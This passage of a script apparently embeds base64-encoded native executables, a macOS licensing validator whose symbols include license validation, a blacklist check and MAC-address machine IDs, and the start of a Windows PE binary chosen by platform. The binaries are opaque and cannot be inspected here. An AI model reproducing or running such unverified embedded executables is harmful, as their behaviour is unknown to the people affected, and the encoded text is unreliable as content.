AAAAAAAAAAEAAAAkAAAAkQAAAAAAAAABAAAATgEAAJEAAAAAAAAAAQAAAC4BAAAwWQAAAQAAAB4PAAAkAQAAMFkAAAEAAAABAAAAJAAAADEAAAAAAAAAAQAAAE4BAAAxAAAAAAAAACwPAAAmBAAAVGMAAAEAAAA+DwAAJgQAAPRkAAABAAAAUA8AACYEAABcZQAAAQAAAGIPAAAmBAAALGYAAAEAAAB0DwAAJg8AAMJyAAABAAAAAQAAAGQBAAAAAAAAAAAAAIQPAAAeAQAAjA0AAAEAAACKDwAADgEAALASAAABAAAAmA8AAA4BAACGPAAAAQAAAK4PAAAOAQAApD0AAAEAAADIDwAADgEAAK89AAABAAAA4g8AAA4BAADqPQAAAQAAAPwPAAAOAQAA9T0AAAEAAAAWEAAADgEAAAA+AAABAAAAMBAAAA4BAAAwPwAAAQAAAD4QAAAOAQAAMFkAAAEAAABMEAAADgQAAGRdAAABAAAAXhAAAA4EAACgXQAAAQAAAHAQAAAOBAAA4F0AAAEAAACCEAAADgQAAEBeAAABAAAAlBAAAA4EAACAXgAAAQAAAKYQAAAOBAAAVGMAAAEAAAC4EAAADgQAAPRkAAABAAAAyhAAAA4EAABcZQAAAQAAANwQAAAOBAAALGYAAAEAAADuEAAADg0AAJByAAABAAAA/xAAAA4PAADAcgAAAQAAAA8RAAAODwAAwXIAAAEAAAAfEQAADg8AAMJyAAABAAAALxEAAA8OAACgcgAAAQAAADcRAAAPDgAAqHIAAAEAAAA/EQAADwEAAPESAAABAAAAVBEAAA8BAADpEgAAAQAAAGwRAAAPAQAAsRMAAAEAAACDEQAADwEAAOESAAABAAAAnREAAA8BAAA3FgAAAQAAAKkRAAAPAQAATD4AAAEAAADYEQAADwEAAJQ+AAABAAAAChIAAA8BAABhPwAAAQAAAC8SAAAPAQAALEkAAAEAAABlEgAADwEAANRPAAABAAAAjRIAAA8BAAC6PwAAAQAAALsSAAAPAYAAclUAAAEAAADZEgAADwGAABRYAAABAAAAPRMAAA8BgACQWAAAAQAAAH4TAAAPAYAACz4AAAEAAAC0EwAADw4AALhyAAABAAAAwBMAAAMBEAAAAAAAAQAAANQTAAAPDgAAsHIAAAEAAADdEwAADwEAAFANAAABAAAA4xMAAAEAAAYAAAAAAAAAAPETAAABAAAGAAAAAAAAAAAAFAAAAQAABQAAAAAAAAAAEBQAAAEAAAQAAAAAAAAAACMUAAABAAAEAAAAAAAAAAA1FAAAAQAABAAAAAAAAAAAaxQAAAEAAAQAAAAAAAAAAKQUAAABAAAEAAAAAAAAAADSFAAAAQAABAAAAAAAAAAAARUAAAEAAAQAAAAAAAAAAB4VAAABAAAEAAAAAAAAAAAuFQAAAQAABAAAAAAAAAAATRUAAAEAAAQAAAAAAAAAAFwVAAABAAAEAAAAAAAAAABpFQAAAQAABAAAAAAAAAAAeBUAAAEAAAQAAAAAAAAAAIoVAAABAAAEAAAAAAAAAACkFQAAAQAABAAAAAAAAAAArxUAAAEAAAQAAAAAAAAAAMYVAAABAAAEAAAAAAAAAADmFQAAAQAABAAAAAAAAAAAABYAAAEAAAQAAAAAAAAAACMWAAABAAAEAAAAAAAAAABDFgAAAQAABAAAAAAAAAAAUxYAAAEAAAQAAAAAAAAAAGYWAAABAAAEAAAAAAAAAAB5FgAAAQAABAAAAAAAAAAAjBYAAAEAAAQAAAAAAAAAAJ8WAAABAAAEAAAAAAAAAAC0FgAAAQAABAAAAAAAAAAAxxYAAAEAAAQAAAAAAAAAANsWAAABAAAEAAAAAAAAAADwFgAAAQAABAAAAAAAAAAA/hYAAAEAAAQAAAAAAAAAAAkXAAABAAAEAAAAAAAAAAA9FwAAAQAABAAAAAAAAAAAgBcAAAEAAAQAAAAAAAAAALAXAAABAAAEAAAAAAAAAADkFwAAAQAABAAAAAAAAAAAJxgAAAEAAAQAAAAAAAAAAFcYAAABAAAEAAAAAAAAAACgGAAAAQAABAAAAAAAAAAA2RgAAAEAAAQAAAAAAAAAAPIYAAABAAAEAAAAAAAAAAALGQAAAQAABAAAAAAAAAAASBkAAAEAAAQAAAAAAAAAAJcZAAABAAAEAAAAAAAAAAC1GQAAAQAABAAAAAAAAAAAwBkAAAEAAAQAAAAAAAAAANEZAAABAIAEAAAAAAAAAADZGQAAAQCABAAAAAAAAAAA4BkAAAEAAAUAAAAAAAAAAO4ZAAABAAAEAAAAAAAAAAABGgAAAQAABAAAAAAAAAAAEhoAAAEAAAQAAAAAAAAAACgaAAABAAAFAAAAAAAAAAA6GgAAAQAABQAAAAAAAAAATRoAAAEAAAUAAAAAAAAAAFMaAAABAAAFAAAAAAAAAABZGgAAAQAABQAAAAAAAAAAXxoAAAEAAAUAAAAAAAAAAGwaAAABAAAFAAAAAAAAAAB4GgAAAQAABQAAAAAAAAAAgBoAAAEAAAUAAAAAAAAAAJIaAAABAAAFAAAAAAAAAACbGgAAAQAABQAAAAAAAAAAoxoAAAEAAAUAAAAAAAAAAKsaAAABAAAFAAAAAAAAAACzGgAAAQAABQAAAAAAAAAAtgAAALMAAAC0AAAAvgAAAL8AAADAAAAAwQAAAMIAAADDAAAAxAAAAMUAAADGAAAAxwAAAMgAAADJAAAAygAAAMsAAADMAAAAzQAAAM4AAADRAAAA0gAAANMAAADUAAAA1QAAANYAAADXAAAA2AAAANkAAADaAAAA2wAAANwAAADdAAAA3gAAAN8AAADgAAAA4QAAAOIAAADjAAAA5AAAAOUAAADnAAAA6AAAAOkAAADrAAAA7AAAAO0AAADvAAAA8AAAAL0AAADuAAAA8gAAAPQAAAD1AAAA9gAAAPcAAAD4AAAA+QAAAPoAAAD7AAAA/AAAAP0AAAD+AAAAuwAAALwAAADPAAAA0AAAAOYAAADqAAAA8QAAAPMAAAD/AAAAAAAAQLYAAACzAAAAtAAAAL4AAAC/AAAAwAAAAMEAAADCAAAAwwAAAMQAAADFAAAAxgAAAMcAAADIAAAAyQAAAMoAAADLAAAAzAAAAM0AAADOAAAA0QAAANIAAADTAAAA1AAAANUAAADWAAAA1wAAANgAAADZAAAA2gAAANsAAADcAAAA3QAAAN4AAADfAAAA4AAAAOEAAADiAAAA4wAAAOQAAADlAAAA5wAAAOgAAADpAAAA6wAAAOwAAADtAAAA7wAAAPAAAAC9AAAA7gAAAPIAAAD0AAAA9QAAAPYAAAD3AAAA+AAAAPkAAAD6AAAA+wAAAPwAAAD9AAAA/gAAALsAAAC8AAAAIAAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvdG9vbHMvTWFjLwAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvdG9vbHMvTWFjLy4uL2Flc2NyaXB0c1ZhbGlkYXRvci5jcHAAL1VzZXJzL1VzZXIvTGlicmFyeS9EZXZlbG9wZXIvWGNvZGUvRGVyaXZlZERhdGEvYWVzY3JpcHRzVmFsaWRhdG9yLWhnem9peXBob2FqdG5qYWlveG9hd3h1dHNscncvQnVpbGQvSW50ZXJtZWRpYXRlcy9hZXNjcmlwdHNWYWxpZGF0b3IuYnVpbGQvUmVsZWFzZS9hZXNjcmlwdHNWYWxpZGF0b3IuYnVpbGQvT2JqZWN0cy1ub3JtYWwveDg2XzY0L2Flc2NyaXB0c1ZhbGlkYXRvci5vAF9tYWluAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9vc3RyZWFtAC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy90b29scy9NYWMvLi4vLi4vaW5jbHVkZS9hZXNjcmlwdHNMaWNlbnNpbmcuaAAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9iYXNpY19zdHJpbmcuaAAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvZXh0L2F0b21pY2l0eS5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL2NoYXJfdHJhaXRzLmgAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvYmFzaWNfaW9zLmgAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvaW9zX2Jhc2UuaABfX0dMT0JBTF9fSV9hAEdDQ19leGNlcHRfdGFibGUwAF9fWlN0TDhfX2lvaW5pdAAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvc3JjL01hYy8AL1VzZXJzL1VzZXIvRG9jdW1lbnRzL1RvYnkvYWVzY3JpcHRzTGljZW5zaW5nL3NyYy9NYWMvLi4vTGljZW5zaW5nX3YyX2Zvcl9TREtfcGx1Z2lucy5jcHAAL1VzZXJzL1VzZXIvRG9jdW1lbnRzL1RvYnkvYWVzY3JpcHRzTGljZW5zaW5nL3Rvb2xzL01hYy8uLi8uLi9saWIvTWFjL2Flc2NyaXB0c0xpY2Vuc2luZ19SZWxlYXNlXzY0LmEoTGljZW5zaW5nX3YyX2Zvcl9TREtfcGx1Z2lucy5vKQBfX1oxOGNoZWNrQmxhY2tMaXN0X29sZGlpAF9fWjE0Y2hlY2tCbGFja0xpc3RpaWlpAF9fWjEzcmV2ZXJzZVN0cmluZ1NzAF9fWjE0bWFrZVNlZWRzQXJyYXlTc2kAX19aNGtleTFTc2kAX19aTDExZ2V0Q2hlY2tzdW1Tc1NzAF9fWkwxMkJpdF9NYW5nbGVfMWlpaWlpaWkAX19aTDEyQml0X01hbmdsZV8yaWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzNpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfNGlpaWlpaWkAX19aTDEyQml0X01hbmdsZV81aWlpaWlpaQBfX1pTdHBsSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVTYklUX1QwX1QxX0VSS1M2X1M4XwBHQ0NfZXhjZXB0X3RhYmxlMgBHQ0NfZXhjZXB0X3RhYmxlMwBHQ0NfZXhjZXB0X3RhYmxlNABHQ0NfZXhjZXB0X3RhYmxlNQBfLm1lbXNldF9wYXR0ZXJuAC9Vc2Vycy9Vc2VyL0RvY3VtZW50cy9Ub2J5L2Flc2NyaXB0c0xpY2Vuc2luZy9zcmMvTWFjLy4uL01BQ0FkZHJlc3NVdGlsaXR5LmNwcAAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvdG9vbHMvTWFjLy4uLy4uL2xpYi9NYWMvYWVzY3JpcHRzTGljZW5zaW5nX1JlbGVhc2VfNjQuYShNQUNBZGRyZXNzVXRpbGl0eS5vKQBfX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0QWxsTUFDQWRkcmVzc2VzRVBoAF9fWk4xN01BQ0FkZHJlc3NVdGlsaXR5MjFHZXRBbGxNQUNBZGRyZXNzZXNNYWNFUGgAX19HTE9CQUxfX0lfYQBfX1pTdEw4X19pb2luaXQAL1VzZXJzL1VzZXIvRG9jdW1lbnRzL1RvYnkvYWVzY3JpcHRzTGljZW5zaW5nL3NyYy9NYWMvLi4vYWVzY3JpcHRzTGljZW5zaW5nLmNwcAAvVXNlcnMvVXNlci9Eb2N1bWVudHMvVG9ieS9hZXNjcmlwdHNMaWNlbnNpbmcvdG9vbHMvTWFjLy4uLy4uL2xpYi9NYWMvYWVzY3JpcHRzTGljZW5zaW5nX1JlbGVhc2VfNjQuYShhZXNjcmlwdHNMaWNlbnNpbmcubykAX19aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAF9fWk45YWVzY3JpcHRzMTlsb2FkTGljZW5zZUZyb21GaWxlRVBjUkExMjhfYwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvZnN0cmVhbQAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9wb3N0eXBlcy5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL3N0bF9pdGVyYXRvci5oAF9fWk45YWVzY3JpcHRzMTV2YWxpZGF0ZUxpY2Vuc2VFUGNpUk5TXzExTGljZW5zZURhdGFFAF9fWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQY1MwXwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvaW9tYW5pcAAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvc3N0cmVhbQBfX1pOOWFlc2NyaXB0czdnZXRQYXRoRVNzYlJTcwBfX1pOU3MxMl9TX2NvbnN0cnVjdElOOV9fZ251X2N4eDE3X19ub3JtYWxfaXRlcmF0b3JJUGNTc0VFRUVTMl9UX1M0X1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvYmFzaWNfc3RyaW5nLnRjYwBfX1pOU3MxMl9TX2NvbnN0cnVjdElQY0VFUzBfVF9TMV9SS1NhSWNFU3QyMGZvcndhcmRfaXRlcmF0b3JfdGFnAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL3N0bF9pdGVyYXRvcl9iYXNlX2Z1bmNzLmgAX19HTE9CQUxfX0lfYQBHQ0NfZXhjZXB0X3RhYmxlMQBHQ0NfZXhjZXB0X3RhYmxlMgBHQ0NfZXhjZXB0X3RhYmxlNgBHQ0NfZXhjZXB0X3RhYmxlOABfX1pTdEw4X19pb2luaXQAX21haW4AX19HTE9CQUxfX0lfYQBfX1pMMTFnZXRDaGVja3N1bVNzU3MAX19aTDEyQml0X01hbmdsZV8xaWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzJpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfM2lpaWlpaWkAX19aTDEyQml0X01hbmdsZV80aWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzVpaWlpaWlpAF9fR0xPQkFMX19JX2EAX19HTE9CQUxfX0lfYQBHQ0NfZXhjZXB0X3RhYmxlMABHQ0NfZXhjZXB0X3RhYmxlMgBHQ0NfZXhjZXB0X3RhYmxlMwBHQ0NfZXhjZXB0X3RhYmxlNABHQ0NfZXhjZXB0X3RhYmxlNQBHQ0NfZXhjZXB0X3RhYmxlMQBHQ0NfZXhjZXB0X3RhYmxlMgBHQ0NfZXhjZXB0X3RhYmxlNgBHQ0NfZXhjZXB0X3RhYmxlOABfLm1lbXNldF9wYXR0ZXJuAF9fWlN0TDhfX2lvaW5pdABfX1pTdEw4X19pb2luaXQAX19aU3RMOF9faW9pbml0AF9OWEFyZ2MAX05YQXJndgBfX1oxM3JldmVyc2VTdHJpbmdTcwBfX1oxNGNoZWNrQmxhY2tMaXN0aWlpaQBfX1oxNG1ha2VTZWVkc0FycmF5U3NpAF9fWjE4Y2hlY2tCbGFja0xpc3Rfb2xkaWkAX19aNGtleTFTc2kAX19aTjE3TUFDQWRkcmVzc1V0aWxpdHkxOEdldEFsbE1BQ0FkZHJlc3Nlc0VQaABfX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTIxR2V0QWxsTUFDQWRkcmVzc2VzTWFjRVBoAF9fWk45YWVzY3JpcHRzMTJnZXRNYWNoaW5lSWRFUkExMjhfYwBfX1pOOWFlc2NyaXB0czE1dmFsaWRhdGVMaWNlbnNlRVBjaVJOU18xMUxpY2Vuc2VEYXRhRQBfX1pOOWFlc2NyaXB0czE3c2F2ZUxpY2Vuc2VUb0ZpbGVFUGNTMF8AX19aTjlhZXNjcmlwdHMxOWxvYWRMaWNlbnNlRnJvbUZpbGVFUGNSQTEyOF9jAF9fWk45YWVzY3JpcHRzN2dldFBhdGhFU3NiUlNzAF9fWk5TczEyX1NfY29uc3RydWN0SU45X19nbnVfY3h4MTdfX25vcm1hbF9pdGVyYXRvcklQY1NzRUVFRVMyX1RfUzRfUktTYUljRVN0MjBmb3J3YXJkX2l0ZXJhdG9yX3RhZwBfX1pOU3MxMl9TX2NvbnN0cnVjdElQY0VFUzBfVF9TMV9SS1NhSWNFU3QyMGZvcndhcmRfaXRlcmF0b3JfdGFnAF9fWlN0cGxJY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRVNiSVRfVDBfVDFfRVJLUzZfUzhfAF9fX3Byb2duYW1lAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2Vudmlyb24Ac3RhcnQAX0ZTRmluZEZvbGRlcgBfRlNSZWZNYWtlUGF0aABfX1Vud2luZF9SZXN1bWUAX19aTktTczRmaW5kRVBLY21tAF9fWk5LU3M2c3Vic3RyRW1tAF9fWk5LU3QxM2Jhc2ljX2ZpbGVidWZJY1N0MTFjaGFyX3RyYWl0c0ljRUU3aXNfb3BlbkV2AF9fWk5LU3QxNWJhc2ljX3N0cmluZ2J1ZkljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFM3N0ckV2AF9fWk5LU3Q5YmFzaWNfaW9zSWNTdDExY2hhcl90cmFpdHNJY0VFNGZpbGxFdgBfX1pOS1N0OWJhc2ljX2lvc0ljU3QxMWNoYXJfdHJhaXRzSWNFRTV3aWRlbkVjAF9fWk5TaTEwX01fZXh0cmFjdEltRUVSU2lSVF8AX19aTlNpNHJlYWRFUGNsAF9fWk5TaTVzZWVrZ0V4U3QxMl9Jb3NfU2Vla2RpcgBfX1pOU2k1dGVsbGdFdgBfX1pOU28zcHV0RWMAX19aTlNvNWZsdXNoRXYAX19aTlNvNXdyaXRlRVBLY2wAX19aTlNvOV9NX2luc2VydEltRUVSU29UXwBfX1pOU29sc0VpAF9fWk5TczEyX01fbGVha19oYXJkRXYAX19aTlNzNF9SZXAxMF9NX2Rlc3Ryb3lFUktTYUljRQBfX1pOU3M0X1JlcDExX1NfdGVybWluYWxFAF9fWk5TczRfUmVwMjBfU19lbXB0eV9yZXBfc3RvcmFnZUUAX19aTlNzNF9SZXA5X1NfY3JlYXRlRW1tUktTYUljRQBfX1pOU3M1ZXJhc2VFbW0AX19aTlNzNmFwcGVuZEVQS2NtAF9fWk5TczZhcHBlbmRFUktTcwBfX1pOU3M2YXNzaWduRVBLY20AX19aTlNzNmFzc2lnbkVSS1NzAF9fWk5TczlfTV9tdXRhdGVFbW1tAF9fWk5TczlwdXNoX2JhY2tFYwBfX1pOU3NDMUVQS2NSS1NhSWNFAF9fWk5Tc0MxRVBLY21SS1NhSWNFAF9fWk5Tc0MxRVJLU3MAX19aTlNzRDJFdgBfX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFNWNsb3NlRXYAX19aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9fWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGUAX19aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXYAX19aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2AF9fWk5TdDhpb3NfYmFzZTRJbml0QzFFdgBfX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX19aTlN0OWJhc2ljX2lvc0ljU3QxMWNoYXJfdHJhaXRzSWNFRTVjbGVhckVTdDEyX0lvc19Jb3N0YXRlAF9fWlN0MTZfX29zdHJlYW1faW5zZXJ0SWNTdDExY2hhcl90cmFpdHNJY0VFUlN0MTNiYXNpY19vc3RyZWFtSVRfVDBfRVM2X1BLUzNfbABfX1pTdDE5X190aHJvd19sb2dpY19lcnJvclBLYwBfX1pTdDRjb3V0AF9fWlN0OXRlcm1pbmF0ZXYAX19aZGFQdgBfX1puYW0AX19fY3hhX2F0ZXhpdABfX19jeGFfYmVnaW5fY2F0Y2gAX19fY3hhX2VuZF9jYXRjaABfX19neHhfcGVyc29uYWxpdHlfdjAAX19fc3RhY2tfY2hrX2ZhaWwAX19fc3RhY2tfY2hrX2d1YXJkAF9hdG9pAF9hdG9sAF9leGl0AF9mcmVlaWZhZGRycwBfZ2V0aWZhZGRycwBfbWVtY3B5AF9tZW1zZXRfcGF0dGVybjE2AF9zcHJpbnRmAF9zdHJjbXAAX3N0cmNweQBfc3RybGVuAGR5bGRfc3R1Yl9iaW5kZXIAAAAAAA==')
return R
if a.__isWindows():
R = at(
'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